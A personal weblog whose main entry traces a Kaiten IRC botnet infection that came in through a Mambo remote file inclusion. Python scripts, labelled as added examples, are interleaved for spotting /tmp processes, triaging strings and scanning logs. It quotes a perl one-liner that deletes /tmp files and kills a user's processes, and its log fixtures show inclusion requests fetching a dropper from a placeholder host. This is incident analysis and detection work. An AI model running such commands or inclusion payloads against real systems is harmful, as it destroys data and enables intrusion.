Tim's WebLog


22C3 0001 - Hacker

From the German Schneider Buch Computerlexikon (1984), translated from the German:

Hackers are the name given to people who crack the computer code, i.e. the access to information stored on other people's computers, by "hacking away" on the keyboard. For this they use their computer and a telephone with a modem. That way they can transfer data from their computer over the telephone network into another computer and retrieve data from it. This "sneaking in" is a new hobby, above all among young people in the USA. They band together into gangs in order to retrieve data from mainframe computers in an organised way. In the past year at least three sensational cases occurred in the field of computer crime.

So happy hacking at 22C3!

Tracking a worm's origin

About a week ago I discovered that a server was consuming a lot of CPU power. Usually it's almost idle all the time, so I had a look. There were some strange processes running on the machine. Looking in the /proc file system I saw that these programs were running from /tmp as user apache - someone came through the webserver. I killed the processes and saved the files to another directory. Since I was short of time I decided to have a closer look later.

Of course I didn't, as I should have. Two days later the same processes were back again. Note to myself: do the work when it needs to be done. Since I didn't do this right away, now was the time for a night shift.

I killed the processes again, saved the files to another directory and cleaned up in general. Since I run a tripwire on that machine I was confident that no other files were changed - it didn't fire, and all created files were still owned by apache, not by root as you see it occasionally if someone really breaks in. So I decided not to reinstall the whole machine but just to have a look and plug the hole.
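A check for the first symptom above, processes whose executable lives in /tmp, as an added example (my own code, not the author's): it walks /proc the way the post describes, reads each process's exe link and real uid, and reports anything executing from a world-writable temp directory. The proc_root parameter exists so it can be pointed at a copy or a test tree; the list of suspect directories is an assumption.

```python
import os
import sys

# Directories that web-application compromises commonly drop payloads into
# (assumed list; extend it for your system).
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def _read_link(path):
    """Read a /proc symlink; None if the process vanished or we lack permission."""
    try:
        return os.readlink(path)
    except OSError:
        return None


def _real_uid(status_path):
    """Pull the real uid out of /proc/<pid>/status ("Uid:<real> <eff> <saved> <fs>")."""
    try:
        with open(status_path) as fh:
            for line in fh:
                if line.startswith("Uid:"):
                    return int(line.split()[1])
    except OSError:
        pass
    return None


def find_suspect_processes(proc_root="/proc", suspect_dirs=SUSPECT_DIRS):
    """Return sorted (pid, real_uid, exe_path) tuples for every process whose
    executable lives under one of suspect_dirs."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip /proc/self, /proc/sys, ...
            continue
        pid_dir = os.path.join(proc_root, entry)
        exe = _read_link(os.path.join(pid_dir, "exe"))
        if exe is None:
            continue
        # The kernel appends " (deleted)" when the binary was unlinked after the
        # process started; strip it so the path still matches the suspect dirs.
        exe = exe.replace(" (deleted)", "")
        if any(exe == d or exe.startswith(d + "/") for d in suspect_dirs):
            hits.append((int(entry), _real_uid(os.path.join(pid_dir, "status")), exe))
    return sorted(hits)


if __name__ == "__main__":
    for pid, uid, exe in find_suspect_processes():
        print(f"pid={pid} uid={uid} exe={exe}")
    sys.exit(0)
```

Run it as root to see every process; as an unprivileged user the exe links of other users' processes are unreadable and silently skipped, which is why a quiet run is not the same as a clean one.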

So to find out where the intruder came from I decided to analyse the binaries I found. I started with the files from the second intrusion. Two binaries were running, one called d, the other called qs. There was another file called mirela that contained a simple script with two wget calls to download d and qs. This request was done from an IP with no reverse lookup - so I decided to look further before contacting the ISP.

The first thing was easy: have a look at all the strings in the binary. The strings tool from binutils does that in an easy manner. The output for qs looked more promising:
[...]
us.undernet.org
eu.undernet.org
NOTICE %s :Unable to comply.
/usr/dict/words
%s : USERID : UNIX : %s
NOTICE %s :GET
NOTICE %s :Unable to create socket.
[...]
NOTICE %s :Kaiten wa goraku
[...]
bash-
#debilii
debilu
NICK %s
USER %s localhost localhost :%s
ERROR

The Kaiten string looked easy enough to be googleable - in fact it took me to Packet Storm. Kaiten happens to be an IRC-based distributed denial of service client. After reading a bit and googling it was clear that it is a client that connects to a given channel with a password and awaits commands. So the next task was to find out the channel and password it connects to.

Looking further in the strings output revealed that someone was really dumb. He used the code as-is. At the end of the file the CHAN and KEY defines are assigned to variables and thus appear late in the output. That was the explanation - in fact you just look in the output and take the only line with a hash as the channel. The similarity makes it easy to guess that the next line contains the password, even without knowing the code...
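The triage just described, as an added example rather than code from the post: a small strings(1) equivalent over a constructed byte blob, followed by the same pattern-matching the author did by eye, picking out hostnames, IRC protocol verbs, the Kaiten marker, the one string beginning with a hash as the channel and the string right after it as the key candidate. The blob, the channel #examplechan and the key examplekey are constructed stand-ins, not the contents of the real qs binary.

```python
import re

# Constructed stand-in for a dropped binary: ELF-like header bytes with a few
# embedded C strings of the kind the post found in qs. Not the real file.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"us.undernet.org\x00"
    + b"eu.undernet.org\x00\x8a\x13"
    + b"NOTICE %s :Unable to comply.\x00"
    + b"NOTICE %s :Kaiten wa goraku\x00\x00\x01"
    + b"ab\x00"                 # shorter than min_len, must be dropped
    + b"#examplechan\x00"       # constructed stand-in for the CHAN define
    + b"examplekey\x00"         # constructed stand-in for the KEY define
    + b"NICK %s\x00"
    + b"USER %s localhost localhost :%s\x00"
)

PRINTABLE = frozenset(range(0x20, 0x7f))   # printable ASCII, the strings(1) default


def extract_strings(blob, min_len=4):
    """Return runs of at least min_len printable ASCII bytes, like strings(1)."""
    found, run = [], bytearray()
    for byte in blob:
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")
IRC_PROTO = re.compile(r"^(NICK|USER|JOIN|PRIVMSG|NOTICE|PONG) ")


def triage_irc_bot(strs):
    """Pull IRC indicators out of a strings listing: likely servers, the protocol
    verbs that mark an IRC client, the Kaiten banner, a '#channel' literal and,
    following the post's observation, the string right after it as key candidate."""
    report = {
        "servers": [s for s in strs if HOSTNAME.match(s)],
        "irc_verbs": sorted({IRC_PROTO.match(s).group(1) for s in strs if IRC_PROTO.match(s)}),
        "kaiten": any("Kaiten" in s for s in strs),
        "channel": None,
        "key_candidate": None,
    }
    for i, s in enumerate(strs):
        if s.startswith("#"):
            report["channel"] = s
            report["key_candidate"] = strs[i + 1] if i + 1 < len(strs) else None
            break
    return report


if __name__ == "__main__":
    print(triage_irc_bot(extract_strings(SAMPLE_BINARY)))
```

The key-after-channel rule only holds because the two defines were left adjacent in the source; for a repacked or stripped sample the listing order can differ, so treat key_candidate as a lead to confirm, not a fact.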

So I fired up my IRC client and connected to undernet which the lines in the beginning of the interesting output revealed. I joined the channel and saw quite a few of these drones in the channel and two users which looked "real". The channel was moderated so there was not really anything I could do.

I decided to analyse the first attack. It turned out that this attack used another channel and password. So I joined that one and was surprised: no bots, just a few IRC ops from the network. I immediately got a message
!junknick SH perl -e 'unlink ; for (1..99999) { kill 9, $_ unless $_ eq $$ }'
which would order a bot to delete all files in /tmp and kill all processes of the user the process is running as, except the perl "killer" itself. This should shut down the bot without too much hassle (it turned out that the admins already knew how the attackers got in). I just answered "Boo!" to this user. This made them curious, and after I told them how I got there we talked on the old, now-closed channel about how I came there and what their findings were.

I told them about the other channel I had found earlier. Immediately they joined that channel and cleaned it up by sending the mentioned command to all bots on the channel and de-oping the "real" users on the channel. An epic battle against the still-joining bots.

During this I had a nice talk with one of these cleanup admins - poor guy. His job was to clean up someone else's mess. It turned out that they had already found the script kiddie who caused that trouble. He had been selling the boxes to other kiddies for flooding other users...

They told me that they probably came into the system through either Webalizer or Mambo. Since I have no Webalizer actively running on the system it had to be Mambo. I don't use it for my own pages but my brother and I were evaluating it for a new client and had a test installation which had not even a publicly known URL. I should have read one of these before... Hopefully Joomla will work better.

So I had a closer look at the Apache error_log file - and I found it. They were calling a Mambo file with invalid variables set. Basically they set the absolute path to the config to an HTTP URL, which would start the download of the mirela file - which would then download d and qs and start them.
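The same trace can be hunted for across a whole log rather than found by eye. As an added example (my own code, not the post's), the scan below parses Apache combined-format access_log lines and flags any request in which a query parameter carries a remote URL, the signature of a remote file inclusion attempt against include()-style code; it catches the percent-encoded form too. The post found its evidence in error_log; this assumes the request line with its query string is in the access log. The log lines are constructed: the addresses, /mambo/somefile.php and the parameter name absolute_path are placeholders, and only the dropper name mirela comes from the post.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access_log lines in Apache "combined" format (not from the
# post's server). somefile.php and absolute_path are placeholder names.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2005:03:12:44 +0100] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2005:03:13:01 +0100] "GET /mambo/somefile.php?absolute_path=http://198.51.100.7/mirela HTTP/1.0" 200 812 "-" "Wget/1.9"
203.0.113.5 - - [10/Dec/2005:03:14:10 +0100] "GET /images/logo.png HTTP/1.1" 200 3321 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2005:03:14:22 +0100] "GET /mambo/somefile.php?absolute_path=https%3A%2F%2F198.51.100.7%2Fmirela HTTP/1.0" 200 812 "-" "Wget/1.9"
203.0.113.9 - - [10/Dec/2005:03:15:00 +0100] "GET /redirect.php?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a URL with a fetchable scheme is what an
# include()-style remote file inclusion looks like from the log side.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return one dict per request in which any query parameter carries a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so an encoded "https%3A%2F%2F" is caught as well
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "path": parts.path,
                    "param": param,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["path"]} {hit["param"]}={hit["value"]} -> {hit["status"]}')
```

A 200 on such a request, as in the second and fourth sample lines, means the script ran to completion with the attacker's URL in place and deserves the same treatment the author gave qs and d; a 404 or 500 is still worth knowing about as a sign someone is probing the installation.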

So after all it turned out that the first assumption, that no other system files were harmed, was true. I removed the Mambo test installations and can be sure that this fixed the problem.

Tracking down the problem in the first place was worth the effort: I know what happened and can sleep well without re-installing the machine.

10^6

One million page requests - even with the 2147483647 bytes mishap - and, taking that into account with an average, I made it more than a month earlier than last year :-) This posting is just for my ego. Go on, nothing to see here.

It's gone

Today I sold my table football. It was quite some fun playing it, but since Buck left for a year in Sweden a couple of months ago there is almost nobody here to play. Now it's gone. Time for a nice armchair to fill the place again.

I guess for the log I should mention that I have been in hospital - again. I had to stay for three days. This time it was an acetylsalicylic acid induced gastritis - after taking a third of the nominal dose. No fun, don't try that at home kids! Got some pain killers. Didn't boost my health up to 100 immediately. But Burger King jumped in and solved that - about five days later. About one hour after I had a chicken burger menu the pain vanished - within minutes. Strange. Don't want to know what they put into this stuff. Now I'm fine again. Note to myself: throw away that green shit.

Floating mind

I'm sitting here in my room, hacking a little bit on NetworkManager. Listening to the Lord of the Rings soundtrack makes my mind float around. I'm thinking about our trip to Scotland in August. It was a great time and it's already that far away. I guess the weather is not as nice as I remember it, but still I would like to be there again - trekking with just Anne and a tent walking through glens and along lochs.

Copyright © 2000-2025 by Tim Niemueller